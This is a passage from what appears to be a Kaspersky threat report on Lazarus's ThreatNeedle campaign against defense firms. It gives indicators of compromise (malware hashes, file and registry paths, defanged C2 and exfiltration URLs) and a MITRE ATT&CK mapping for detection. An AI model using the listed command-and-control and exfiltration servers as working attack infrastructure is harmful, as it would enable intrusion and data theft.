the Lazarus group has focused on attacking financial institutions around the world. However, beginning in early 2020, they turned their focus to aggressively attacking the defense industry. 
While Lazarus has previously used the ThreatNeedle malware seen in this attack when targeting cryptocurrency businesses, it is now being actively used in cyberespionage attacks.</p> <p>This investigation allowed us to establish strong ties between multiple campaigns that Lazarus has conducted, reinforcing our attribution. In this campaign, the Lazarus group demonstrated its level of sophistication and its ability to circumvent the security measures it faces during attacks, such as network segmentation. We assess that Lazarus is a highly prolific group, conducting several campaigns using different strategies. The group shared tools and infrastructure among these campaigns to accomplish its goals.</p> <p><em>Kaspersky ICS CERT would like to thank Vasily Berdnikov (Kaspersky targeted attacks research group) for his help.</em></p> <h2 id="appendix-i-indicators-of-compromise">Appendix I – Indicators of Compromise</h2> <p><strong>Malicious documents</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/e7aa0237fc3db67a96ebd877806a2c88/?utm_source=SL&utm_medium=SL&utm_campaign=SL">e7aa0237fc3db67a96ebd877806a2c88</a></td> <td>Boeing_AERO_GS.docx</td> </tr> </tbody> </table> <p><strong>Installer</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/b191cc4d73a247afe0a62a8c38dc9137/?utm_source=SL&utm_medium=SL&utm_campaign=SL">b191cc4d73a247afe0a62a8c38dc9137</a></td> <td>%APPDATA%\Microsoft\DRM\logon.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/9e440e231ef2c62c78147169a26a1bd3/?utm_source=SL&utm_medium=SL&utm_campaign=SL">9e440e231ef2c62c78147169a26a1bd3</a></td> <td>C:\ProgramData\ntnser.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/b7cc295767c1d8c6c68b1bb6c4b4214f/?utm_source=SL&utm_medium=SL&utm_campaign=SL">b7cc295767c1d8c6c68b1bb6c4b4214f</a></td> <td>C:\ProgramData\ntnser.bin</td> </tr> <tr> <td><a 
href="https://opentip.kaspersky.com/0f967343e50500494cf3481ce4de698c/?utm_source=SL&utm_medium=SL&utm_campaign=SL">0f967343e50500494cf3481ce4de698c</a></td> <td>C:\ProgramData\Microsoft\MSDN\msdn.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/09aa1427f26e7dd48955f09a9c604564/?utm_source=SL&utm_medium=SL&utm_campaign=SL">09aa1427f26e7dd48955f09a9c604564</a></td> <td>%APPDATA\Microsoft\info.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/07b22533d08f32d48485a521dbc1974d/?utm_source=SL&utm_medium=SL&utm_campaign=SL">07b22533d08f32d48485a521dbc1974d</a></td> <td>C:\ProgramData\adobe\load.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/1c5e4d60a1041cf2903817a31c1fa212/?utm_source=SL&utm_medium=SL&utm_campaign=SL">1c5e4d60a1041cf2903817a31c1fa212</a></td> <td>C:\ProgramData\Adobe\adobe.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/4cebc83229a40c25434c51ee3d6be13e/?utm_source=SL&utm_medium=SL&utm_campaign=SL">4cebc83229a40c25434c51ee3d6be13e</a></td> <td>C:\ProgramData\Adobe\up.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/23b04b18c75aa7d286fea5d28d41a830/?utm_source=SL&utm_medium=SL&utm_campaign=SL">23b04b18c75aa7d286fea5d28d41a830</a></td> <td>%APPDATA%\Microsoft\DRM\logon.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/319ace20f6ffd39b7fff1444f73c9f5d/?utm_source=SL&utm_medium=SL&utm_campaign=SL">319ace20f6ffd39b7fff1444f73c9f5d</a></td> <td>%APPDATA%\Microsoft\DRM\logon.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/45c0a6e13cad26c69eff59fded88ef36/?utm_source=SL&utm_medium=SL&utm_campaign=SL">45c0a6e13cad26c69eff59fded88ef36</a></td> <td>%APPDATA%\Microsoft\DRM\logon.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/486f25db5ca980ef4a7f6dfbf9e2a1ad/?utm_source=SL&utm_medium=SL&utm_campaign=SL">486f25db5ca980ef4a7f6dfbf9e2a1ad</a></td> <td>C:\ProgramData\ntusers.dat</td> </tr> <tr> <td><a 
href="https://opentip.kaspersky.com/1333967486d3ab50d768fb745dae9af5/?utm_source=SL&utm_medium=SL&utm_campaign=SL">1333967486d3ab50d768fb745dae9af5</a></td> <td>C:\PerfLogs\log.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/07b22533d08f32d48485a521dbc1974d/?utm_source=SL&utm_medium=SL&utm_campaign=SL">07b22533d08f32d48485a521dbc1974d</a></td> <td>C:\ProgramData\Adobe\load.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/c86d0a2fa9c4ef59aa09e2435b4ab70c/?utm_source=SL&utm_medium=SL&utm_campaign=SL">c86d0a2fa9c4ef59aa09e2435b4ab70c</a></td> <td>%TEMP%\ETS4659.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/69d71f06fbfe177fb1a5f57b9c3ae587/?utm_source=SL&utm_medium=SL&utm_campaign=SL">69d71f06fbfe177fb1a5f57b9c3ae587</a></td> <td>%APPDATA%\Microsoft\Windows\shsvcs.db</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/7bad67dcaf269f9ee18869e5ef6b2dc1/?utm_source=SL&utm_medium=SL&utm_campaign=SL">7bad67dcaf269f9ee18869e5ef6b2dc1</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/956e5138940a4f44d1c2c24f122966bd/?utm_source=SL&utm_medium=SL&utm_campaign=SL">956e5138940a4f44d1c2c24f122966bd</a></td> <td>%APPDATA%\ntuser.bin</td> </tr> </tbody> </table> <p><strong>Loader</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/ed627b7bbf7ea78c343e9fb99783c62b/?utm_source=SL&utm_medium=SL&utm_campaign=SL">ed627b7bbf7ea78c343e9fb99783c62b</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/1a17609b7df20dcb3bd1b71b7cb3c674/?utm_source=SL&utm_medium=SL&utm_campaign=SL">1a17609b7df20dcb3bd1b71b7cb3c674</a></td> <td>%ALLUSERSPROFILE%\ntuser.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/fa9635b479a79a3e3fba3d9e65b842c3/?utm_source=SL&utm_medium=SL&utm_campaign=SL">fa9635b479a79a3e3fba3d9e65b842c3</a></td> <td> </td> </tr> <tr> <td><a 
href="https://opentip.kaspersky.com/3758bda17b20010ff864575b0ccd9e50/?utm_source=SL&utm_medium=SL&utm_campaign=SL">3758bda17b20010ff864575b0ccd9e50</a></td> <td>%SYSTEMROOT%\system\mraudio.drv</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/cbcf15e272c422b029fcf1b82709e333/?utm_source=SL&utm_medium=SL&utm_campaign=SL">cbcf15e272c422b029fcf1b82709e333</a></td> <td>%SYSTEMROOT%\system\mraudio.drv</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/9cb513684f1024bea912e539e482473a/?utm_source=SL&utm_medium=SL&utm_campaign=SL">9cb513684f1024bea912e539e482473a</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/36ab0902797bd18acd6880040369731c/?utm_source=SL&utm_medium=SL&utm_campaign=SL">36ab0902797bd18acd6880040369731c</a></td> <td>%SYSTEMROOT%\LogonHours.sys</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/db35391857bcf7b0fa17dbbed97ad269/?utm_source=SL&utm_medium=SL&utm_campaign=SL">db35391857bcf7b0fa17dbbed97ad269</a></td> <td>%ALLUSERSPROFILE%\Adobe\update.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/be4c927f636d2ae88a1e0786551bf3c4/?utm_source=SL&utm_medium=SL&utm_campaign=SL">be4c927f636d2ae88a1e0786551bf3c4</a></td> <td>%ALLUSERSPROFILE%\Adobe\unpack.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/728948c66582858f6a3d3136c7fbe84a/?utm_source=SL&utm_medium=SL&utm_campaign=SL">728948c66582858f6a3d3136c7fbe84a</a></td> <td>%APPDATA%\Microsoft\IBM.DAT</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/06af39b9954dfe9ac5e4ec397a3003fb/?utm_source=SL&utm_medium=SL&utm_campaign=SL">06af39b9954dfe9ac5e4ec397a3003fb</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/29c5eb3f17273383782c716754a3025a/?utm_source=SL&utm_medium=SL&utm_campaign=SL">29c5eb3f17273383782c716754a3025a</a></td> <td> </td> </tr> <tr> <td><a 
href="https://opentip.kaspersky.com/79d58b6e850647024fea1c53e997a3f6/?utm_source=SL&utm_medium=SL&utm_campaign=SL">79d58b6e850647024fea1c53e997a3f6</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/e604185ee40264da4b7d10fdb6c7ab5e/?utm_source=SL&utm_medium=SL&utm_campaign=SL">e604185ee40264da4b7d10fdb6c7ab5e</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/2a73d232334e9956d5b712cc74e01753/?utm_source=SL&utm_medium=SL&utm_campaign=SL">2a73d232334e9956d5b712cc74e01753</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/1a17609b7df20dcb3bd1b71b7cb3c674/?utm_source=SL&utm_medium=SL&utm_campaign=SL">1a17609b7df20dcb3bd1b71b7cb3c674</a></td> <td>%ALLUSERSPROFILE%\ntuser.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/459be1d21a026d5ac3580888c8239b07/?utm_source=SL&utm_medium=SL&utm_campaign=SL">459be1d21a026d5ac3580888c8239b07</a></td> <td>%ALLUSERSPROFILE%\ntuser.bin</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/87fb7be83eff9bea0d6cc95d68865564/?utm_source=SL&utm_medium=SL&utm_campaign=SL">87fb7be83eff9bea0d6cc95d68865564</a></td> <td>%SYSTEMROOT%\SysWOW64\wmdmpmsp.sys</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/062a40e74f8033138d19aa94f0d0ed6e/?utm_source=SL&utm_medium=SL&utm_campaign=SL">062a40e74f8033138d19aa94f0d0ed6e</a></td> <td>%APPDATA%\microsoft\OutIook.db</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/9b17f0db7aeff5d479eaee8056b9ac09/?utm_source=SL&utm_medium=SL&utm_campaign=SL">9b17f0db7aeff5d479eaee8056b9ac09</a></td> <td>%TEMP%\ETS4658.tmp, %APPDATA%\Temp\BTM0345.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/9b17f0db7aeff5d479eaee8056b9ac09/?utm_source=SL&utm_medium=SL&utm_campaign=SL">9b17f0db7aeff5d479eaee8056b9ac09</a></td> <td>%APPDATA%\Temp\BTM0345.tmp</td> </tr> <tr> <td><a 
href="https://opentip.kaspersky.com/420d91db69b83ac9ca3be23f6b3a620b/?utm_source=SL&utm_medium=SL&utm_campaign=SL">420d91db69b83ac9ca3be23f6b3a620b</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/238e31b562418c236ed1a0445016117c/?utm_source=SL&utm_medium=SL&utm_campaign=SL">238e31b562418c236ed1a0445016117c</a></td> <td>%APPDATA%\Microsoft\Windows\lconcaches.db, %TEMP%\cache.db</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/36ab0902797bd18acd6880040369731c/?utm_source=SL&utm_medium=SL&utm_campaign=SL">36ab0902797bd18acd6880040369731c</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/238e31b562418c236ed1a0445016117c/?utm_source=SL&utm_medium=SL&utm_campaign=SL">238e31b562418c236ed1a0445016117c</a></td> <td>%TEMP%\cache.db, %APPDATA%\Microsoft\Windows\lconcaches.db</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/ad1a93d6e6b8a4f6956186c213494d17/?utm_source=SL&utm_medium=SL&utm_campaign=SL">ad1a93d6e6b8a4f6956186c213494d17</a></td> <td>%APPDATA%\Microsoft\Windows\shsvcs.db</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/c34d5d2cc857b6ee9038d8bb107800f1/?utm_source=SL&utm_medium=SL&utm_campaign=SL">c34d5d2cc857b6ee9038d8bb107800f1</a></td> <td> </td> </tr> </tbody> </table> <p><strong>Registry Loader</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/16824dfd4a380699f3841a6fa7e52c6d/?utm_source=SL&utm_medium=SL&utm_campaign=SL">16824dfd4a380699f3841a6fa7e52c6d</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/aa74ed16b0057b31c835a5ef8a105942/?utm_source=SL&utm_medium=SL&utm_campaign=SL">aa74ed16b0057b31c835a5ef8a105942</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/85621411e4c80897c588b5df53d26270/?utm_source=SL&utm_medium=SL&utm_campaign=SL">85621411e4c80897c588b5df53d26270</a></td> <td>%SYSTEMROOT%\system\avimovie.dll</td> </tr> <tr> <td><a 
href="https://opentip.kaspersky.com/a611d023dfdd7ca1fab07f976d2b6629/?utm_source=SL&utm_medium=SL&utm_campaign=SL">a611d023dfdd7ca1fab07f976d2b6629</a></td> <td> </td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/160d0e396bf8ec87930a5df46469a960/?utm_source=SL&utm_medium=SL&utm_campaign=SL">160d0e396bf8ec87930a5df46469a960</a></td> <td>%WINDIR%\winhelp.dll</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/110e1c46fd9a39a1c86292487994e5bd/?utm_source=SL&utm_medium=SL&utm_campaign=SL">110e1c46fd9a39a1c86292487994e5bd</a></td> <td> </td> </tr> </tbody> </table> <p><strong>Downloader</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/ac86d95e959452d189e30fa6ded05069/?utm_source=SL&utm_medium=SL&utm_campaign=SL">ac86d95e959452d189e30fa6ded05069</a></td> <td>%APPDATA%\Microsoft\thumbnails.db</td> </tr> </tbody> </table> <p><strong>Trojanized VNC Uploader</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/bea90d0ef40a657cb291d25c4573768d/?utm_source=SL&utm_medium=SL&utm_campaign=SL">bea90d0ef40a657cb291d25c4573768d</a></td> <td>%ALLUSERSPROFILE%\adobe\arm86.dat</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/254a7a0c1db2bea788ca826f4b5bf51a/?utm_source=SL&utm_medium=SL&utm_campaign=SL">254a7a0c1db2bea788ca826f4b5bf51a</a></td> <td>%APPDATA%\PBL\user.tmp, %APPDATA%\Comms\Comms.dat</td> </tr> </tbody> </table> <p><strong>Tunneling Tool</strong></p> <table border="0"> <tbody> <tr> <td><a href="https://opentip.kaspersky.com/6f0c7cbd57439e391c93a2101f958ccd/?utm_source=SL&utm_medium=SL&utm_campaign=SL">6f0c7cbd57439e391c93a2101f958ccd</a></td> <td>%APPDATA\PBL\update.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/fc9e7dc13ce7edc590ef7dfce12fe017/?utm_source=SL&utm_medium=SL&utm_campaign=SL">fc9e7dc13ce7edc590ef7dfce12fe017</a></td> <td> </td> </tr> </tbody> </table> <p><strong>LPEClient</strong></p> <table border="0"> <tbody> <tr> <td><a 
href="https://opentip.kaspersky.com/0aceeb2d38fe8b5ef2899dd6b80bfc08/?utm_source=SL&utm_medium=SL&utm_campaign=SL">0aceeb2d38fe8b5ef2899dd6b80bfc08</a></td> <td>%TEMP%\ETS5659.tmp</td> </tr> <tr> <td><a href="https://opentip.kaspersky.com/09580ea6f1fe941f1984b4e1e442e0a5/?utm_source=SL&utm_medium=SL&utm_campaign=SL">09580ea6f1fe941f1984b4e1e442e0a5</a></td> <td>%TEMP%\ETS4658.tmp</td> </tr> </tbody> </table> <p><strong>File path</strong><br /> %SYSTEMROOT%\system32\bcdbootinfo.tlp<br /> %SYSTEMROOT%\system32\Nwsapagent.sys<br /> %SYSTEMROOT%\system32\SRService.sys<br /> %SYSTEMROOT%\system32\NWCWorkstation.sys<br /> %SYSTEMROOT%\system32\WmdmPmSp.sys<br /> %SYSTEMROOT%\system32\PCAudit.sys<br /> %SYSTEMROOT%\system32\helpsvc.sys</p> <p><strong>Registry Path</strong><br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description<br /> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig – SubVersion</p> <p><strong>Domains and IPs</strong><br /> hxxp://forum.iron-maiden[.]ru/core/cache/index[.]php<br /> hxxp://www.au-pair[.]org/admin/Newspaper[.]asp<br /> hxxp://www.au-pair[.]org/admin/login[.]asp<br /> hxxp://www.colasprint[.]com/_vti_log/upload[.]asp<br /> hxxp://www.djasw.or[.]kr/sub/popup/images/upfiles[.]asp<br /> hxxp://www.kwwa[.]org/popup/160307/popup_160308[.]asp<br /> hxxp://www.kwwa[.]org/DR6001/FN6006LS[.]asp<br /> hxxp://www.sanatoliacare[.]com/include/index[.]asp<br /> hxxps://americanhotboats[.]com/forums/core/cache/index[.]php<br /> hxxps://docentfx[.]com/wp-admin/includes/upload[.]php<br /> hxxps://kannadagrahakarakoota[.]org/forums/admincp/upload[.]php<br /> hxxps://polyboatowners[.]com/2010/images/BOTM/upload[.]php<br /> hxxps://ryanmcbain[.]com/forum/core/cache/upload[.]php<br /> hxxps://shinwonbook.co[.]kr/basket/pay/open[.]asp<br /> hxxps://shinwonbook.co[.]kr/board/editor/upload[.]asp<br /> hxxps://theforceawakenstoys[.]com/vBulletin/core/cache/upload[.]php<br /> 
hxxps://www.automercado.co[.]cr/empleo/css/main[.]jsp<br /> hxxps://www.curiofirenze[.]com/include/inc-site[.]asp<br /> hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php<br /> hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php<br /> hxxps://www.dronerc[.]it/forum/uploads/index[.]php<br /> hxxps://www.dronerc[.]it/shop_testbr/Adapter/Adapter_Config[.]php<br /> hxxps://www.edujikim[.]com/intro/blue/view[.]asp<br /> hxxps://www.edujikim[.]com/pay/sample/INIstart[.]asp<br /> hxxps://www.edujikim[.]com/smarteditor/img/upload[.]asp<br /> hxxps://www.fabioluciani[.]com/ae/include/constant[.]asp<br /> hxxps://www.fabioluciani[.]com/es/include/include[.]asp<br /> hxxp://www.juvillage.co[.]kr/img/upload[.]asp<br /> hxxps://www.lyzeum[.]com/board/bbs/bbs_read[.]asp<br /> hxxps://www.lyzeum[.]com/images/board/upload[.]asp<br /> hxxps://martiancartel[.]com/forum/customavatars/avatars[.]php<br /> hxxps://www.polyboatowners[.]com/css/index[.]php<br /> hxxps://www.sanlorenzoyacht[.]com/newsl/include/inc-map[.]asp<br /> hxxps://www.raiestatesandbuilders[.]com/admin/installer/installer/index[.]php<br /> hxxp://156.245.16[.]55/admin/admin[.]asp<br /> hxxp://fredrikarnell[.]com/marocko2014/index[.]php<br /> hxxp://roit.co[.]kr/xyz/mainpage/view[.]asp</p> <p><strong>Second stage C2 address</strong><br /> hxxps://www.waterdoblog[.]com/uploads/index[.]asp<br /> hxxp://www.kbcwainwrightchallenge.org[.]uk/connections/dbconn[.]asp</p> <p><strong>C2 URLs to exfiltrate files used by Trojanized VNC Uploader</strong><br /> hxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php<br /> hxxps://newidealupvc[.]com:443/img/prettyPhoto/jquery.max[.]php<br /> hxxps://mdim.in[.]ua:443/core/cache/index[.]php<br /> hxxps://forum.snowreport[.]gr:443/cache/template/upload[.]php<br /> hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp<br /> hxxps://www.dellarocca[.]net/it/content/img/img[.]asp<br /> hxxps://www.astedams[.]it/photos/image/image[.]asp<br /> 
hxxps://www.geeks-board[.]com/blog/wp-content/uploads/2017/cache[.]php<br /> hxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp</p> <h2 id="appendix-ii-mitre-attck-mapping">Appendix II – MITRE ATT&CK Mapping</h2> <table> <tbody> <tr> <td style="background-color: black;color: white;text-align: center"><strong>Tactic</strong></td> <td style="background-color: black;color: white;text-align: center"><strong>Technique</strong></td> <td style="background-color: black;color: white;text-align: center"><strong>Technique Name</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Initial Access</strong></td> <td style="background-color: lightgrey"><strong>T1566.002</strong></td> <td style="background-color: lightgrey"><strong>Phishing: Spearphishing Link</strong></td> </tr> <tr> <td style="background-color: grey"> <strong>Execution</strong></td> <td style="background-color: lightgrey"><strong>T1059.003</strong><br /> <strong>T1204.002</strong><br /> <strong>T1569.002</strong></td> <td style="background-color: lightgrey"> <strong>Command and Scripting Interpreter: Windows Command Shell</strong><br /> <strong>User Execution: Malicious File</strong><br /> <strong>System Services: Service Execution</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Persistence</strong></td> <td style="background-color: lightgrey"><strong>T1543.003</strong><br /> <strong>T1547.001</strong></td> <td style="background-color: lightgrey"> <strong>Create or Modify System Process: Windows Service</strong><br /> <strong>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Privilege Escalation</strong></td> <td style="background-color: lightgrey"><strong>T1543.003</strong></td> <td style="background-color: lightgrey"><strong>Create or Modify System Process: Windows Service</strong></td> </tr> <tr> <td style="background-color: grey"> <strong>Defense Evasion</strong></td> <td 
style="background-color: lightgrey"> <strong>T1140</strong><br /> <strong>T1070.002</strong><br /> <strong>T1070.003</strong><br /> <strong>T1070.004</strong><br /> <strong>T1036.003</strong><br /> <strong>T1036.004</strong><br /> <strong>T1112</strong></td> <td style="background-color: lightgrey"> <strong>Deobfuscate/Decode Files or Information</strong><br /> <strong>Clear Linux or Mac System Logs</strong><br /> <strong>Clear Command History</strong><br /> <strong>File Deletion</strong><br /> <strong>Masquerading: Rename System Utilities</strong><br /> <strong>Masquerading: Masquerade Task or Service</strong><br /> <strong>Modify Registry</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Credential Access</strong></td> <td style="background-color: lightgrey"><strong>T1557.001</strong></td> <td style="background-color: lightgrey"><strong>LLMNR/NBT-NS Poisoning and SMB Relay</strong></td> </tr> <tr> <td style="background-color: grey"> <strong>Discovery</strong></td> <td style="background-color: lightgrey"> <strong>T1135</strong><br /> <strong>T1057</strong><br /> <strong>T1016</strong><br /> <strong>T1033</strong><br /> <strong>T1049</strong><br /> <strong>T1082</strong><br /> <strong>T1083</strong><br /> <strong>T1007</strong></td> <td style="background-color: lightgrey"> <strong>Network Share Discovery</strong><br /> <strong>Process Discovery</strong><br /> <strong>System Network Configuration Discovery</strong><br /> <strong>System Owner/User Discovery</strong><br /> <strong>System Network Connections Discovery</strong><br /> <strong>System Information Discovery</strong><br /> <strong>File and Directory Discovery</strong><br /> <strong>System Service Discovery</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Lateral Movement</strong></td> <td style="background-color: lightgrey"><strong>T1021.002</strong></td> <td style="background-color: lightgrey"><strong>SMB/Windows Admin Shares</strong></td> </tr> <tr> <td 
style="background-color: grey"><strong>Collection</strong></td> <td style="background-color: lightgrey"><strong>T1560.001</strong></td> <td style="background-color: lightgrey"><strong>Archive Collected Data: Archive via Utility</strong></td> </tr> <tr> <td style="background-color: grey"> <strong>Command and Control</strong></td> <td style="background-color: lightgrey"> <strong>T1071.001</strong><br /> <strong>T1132.002</strong><br /> <strong>T1104</strong><br /> <strong>T1572</strong><br /> <strong>T1090.001</strong></td> <td style="background-color: lightgrey"> <strong>Application Layer Protocol: Web Protocols</strong><br /> <strong>Non-Standard Encoding</strong><br /> <strong>Multi-Stage Channels</strong><br /> <strong>Protocol Tunneling</strong><br /> <strong>Internal Proxy</strong></td> </tr> <tr> <td style="background-color: grey"><strong>Exfiltration</strong></td> <td style="background-color: lightgrey"><strong>T1041</strong></td> <td style="background-color: lightgrey"><strong>Exfiltration Over C2 Channel</strong></td> </tr> </tbody> </table> </div> </div> </div> <div class="c-article__footer"> <div class="c-article__categories"> <ul class="c-list-tags"> <li><a href="https://securelist.com/tag/apt/" class="c-link-tag"><span>APT</span></a></li> <li><a href="https://securelist.com/tag/lazarus/" class="c-link-tag"><span>Lazarus</span></a></li> <li><a href="https://securelist.com/tag/macros/" class="c-link-tag"><span>Macros</span></a></li> <li><a href="https://securelist.com/tag/malware-descriptions/" class="c-link-tag"><span>Malware Descriptions</span></a></li> <li><a href="https://securelist.com/tag/malware-technologies/" class="c-link-tag"><span>Malware Technologies</span></a></li> <li><a href="https://securelist.com/tag/microsoft-office/" class="c-link-tag"><span>Microsoft Office</span></a></li> <li><a href="https://securelist.com/tag/spear-phishing/" class="c-link-tag"><span>Spear phishing</span></a></li> </ul> </div> <div class="c-article__authors 
u-hidden@md"> <p class="c-title--extra-small">Authors</p> <ul class="c-list-authors"> <li> <a href="https://securelist.com/author/vyacheslavkopeytsev/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_2.png"> <span>Vyacheslav Kopeytsev</span></a> </li> <li> <a href="https://securelist.com/author/seongsupark/" > <img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/avatar-default/avatar_default_1.png"> <span>Seongsu Park</span></a> </li> </ul> </div> </div>
src="https://securelist.com/wp-content/themes/securelist2020/assets/images/icon/icon-categories--invert.svg" /> </div> </div> <div class="c-highlight__title"> <p>Table of Contents</p> </div> </div> </div> <div class="js-accordion-container"> <div class="c-highlight__body"> <ul class='c-list-links'><li><a href="#initial-infection">Initial infection</a></li><li><a href="#malware-implants">Malware implants</a></li><ul class='c-list-links'><li><a href="#threatneedle-installer">ThreatNeedle installer</a></li><li><a href="#threatneedle-loader">ThreatNeedle loader</a></li><li><a href="#threatneedle-backdoor">ThreatNeedle backdoor</a></li></ul><li><a href="#post-exploitation-phase">Post-exploitation phase</a></li><ul class='c-list-links'><li><a href="#credential-gathering">Credential gathering</a></li><li><a href="#lateral-movement">Lateral movement</a></li><li><a href="#overcoming-network-segmentation">Overcoming network segmentation</a></li><li><a href="#exfiltration">Exfiltration</a></li></ul><li><a href="#attribution">Attribution</a></li><ul class='c-list-links'><li><a href="#connection-with-deathnote-cluster">Connection with DeathNote cluster</a></li><li><a href="#connection-with-operation-applejeus">Connection with Operation AppleJeus</a></li><li><a href="#connection-with-bookcode-cluster">Connection with Bookcode cluster</a></li></ul><li><a href="#conclusions">Conclusions</a></li><li><a href="#appendix-i-indicators-of-compromise">Appendix I – Indicators of Compromise</a></li><li><a href="#appendix-ii-mitre-attck-mapping">Appendix II – MITRE ATT&CK Mapping</a></li></ul> </div> </div> </div> </div> <div class="c-widget__wrapper"> <div class="js-sticky-widget"> <p><span class="c-tag c-tag--primary">GReAT webinars</span></p> <div class="o-row o-row--small-gutters"> <div class="o-col-12 c-card__dividers c-card__dividers--hide-first@xs c-card__dividers--show-last@xs"> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header 
class="c-card__header"> <time datetime="2021-05-13T13:00:00+00:00" class="c-card__event-date"> 13 May 2021, 1:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-balalaika-edition/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-balalaika-edition/" class="c-card__link">GReAT Ideas. Balalaika Edition</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/borislarin/" > <span>Boris Larin</span></a> </li> <li> <a href="https://securelist.com/author/denislegezo/" > <span>Denis Legezo</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> <time datetime="2021-02-26T12:00:00+00:00" class="c-card__event-date"> 26 Feb 2021, 12:00pm </time> <h3 class="c-card__title c-card__title--has-icon"><a href="https://securelist.com/webinars/great-ideas-green-tea-edition/" class="c-card__title-icon"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-webinar"></use></svg></a><a href="https://securelist.com/webinars/great-ideas-green-tea-edition/" class="c-card__link">GReAT Ideas. 
Green Tea Edition</a></h3> </header> <footer class="c-card__footer"> <div class="c-card__authors"> <ul class="c-list-authors c-list-authors--comma"> <li> <a href="https://securelist.com/author/johnhultquist/" > <span>John Hultquist</span></a> </li> <li> <a href="https://securelist.com/author/brian_bartholomew/" > <span>Brian Bartholomew</span></a> </li> <li> <a href="https://securelist.com/author/suguru/" > <span>Suguru Ishimaru</span></a> </li> <li> <a href="https://securelist.com/author/vitalykamluk/" > <span>Vitaly Kamluk</span></a> </li> <li> <a href="https://securelist.com/author/seongsupark/" > <span>Seongsu Park</span></a> </li> <li> <a href="https://securelist.com/author/yusukeniwa/" > <span>Yusuke Niwa</span></a> </li> <li> <a href="https://securelist.com/author/motohikosato/" > <span>Motohiko Sato</span></a> </li> </ul> </div> </footer> </div> </article> <article class="c-card c-card--hor-reverse@xs u-items-center"> <div class="c-card__body"> <header class="c-card__header"> 